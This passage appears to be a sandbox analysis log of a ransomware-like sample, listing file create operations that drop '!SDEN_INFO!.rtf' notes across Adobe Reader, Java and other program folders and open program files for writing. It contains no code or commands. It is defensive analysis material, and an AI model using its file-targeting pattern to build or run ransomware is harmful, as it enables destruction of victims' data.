| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\en-ae\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\es-es\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\fr-fr\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\it-it\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\pt-br\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\zh-cn\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\en-il\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ko-kr\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\sv-se\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\de-de\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\hu-hu\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\pl-pl\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ru-ru\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\uk-ua\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\convertpdf-selector.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\illustrations_retina.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-ae\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\new_icons.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\RHP_icons.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\images\cursors\win32_MoveNoDrop32x32.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\logging.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ca-es\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\tr-tr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ja-jp\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\psfontj2d.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\arrow-left.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-right-pressed.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-up-pressed.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\eu-es\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\eu-es\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\nl-nl\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\sl-si\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\de-de\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\el-GR\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Checkers.api | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\epdf\plugin.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\it-it\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\sk-sk\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account-select\css\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\amd64\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Mozilla Firefox\fonts\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\rempl\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\de-CH\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\en-MY\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\es-US\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\gl-ES\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\lb-LU\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\pt-BR\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\th-TH\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\themes\dark\example_icons.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\nl-nl\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\en-ae\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\security\US_export_policy.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\bad_6088DED4F047F45E.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\cs-cz\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\fr-fr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\en-ae\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\rhp_world_icon.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\hu-hu\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\en-PH\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ja-jp\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\MPP\QuickTime.mpp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ru-ru\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\et-EE\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\warning.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\nb-no\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sl-si\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\pt-br\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\it-it\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Microsoft Office 15\ClientX64\IntegratedOffice.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\fr-ma\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\en-gb\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\eu-es\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ja-jp\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\nb-no\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\nl-nl\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\sk-sk\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\css\main-selector.css | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\zh-cn\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\588bce7c90097ed212\Windows6.1-KB958488-v6001-x64.msu | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\rhp\convertpdf-rna-selector.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\sl-si\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\tr-tr\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ca-es\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\cs-cz\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\de-de\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\en-ae\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\fr-fr\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\hu-hu\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\libs\require\2.1.15\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\eu-es\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\nl-nl\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\fi-fi\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\epdf\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\themes\dark\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\sk-sk\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\rhp_world_icon.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\en-ae\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
